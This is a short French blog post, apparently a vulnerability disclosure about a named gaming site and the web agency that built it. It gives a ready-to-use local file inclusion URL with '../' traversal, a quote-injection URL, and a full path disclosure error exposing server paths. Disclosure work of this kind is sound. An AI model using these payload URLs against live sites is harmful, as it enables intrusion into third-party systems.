L’objectif est de faire prendre conscience de la nécessité d’une politique globale en faveur d’une sécurité transparente. Je ne saurais être tenu responsable de toutes mauvaises utilisations de ces informations dans le cas où l’entreprise n’a pas pris au sérieux mon alerte.


La vulnérabilité de type LFI se génère ici : https://www.rushongame.com/scripts/script.php?lg=../executions/modules

De ce même fichier et paramètre en découle une FPD : Warning: require(/home/rushongame/public_html/scripts/../languages/'.php): failed to open stream: No such file or directory in /home/rushongame/public_html/scripts/script.php on line 27

Et au passage, une petite anomalie amusante : https://en.rushongame.com/infos/niMenu.php?nbSousMenu=666&nbSousEnsemble=666

L’agence web, qui a conçu ce site, est aussi vulnérable : https://www.net-invaders.com/infos/script.php?lg=%27

Article Suivant Article Précédent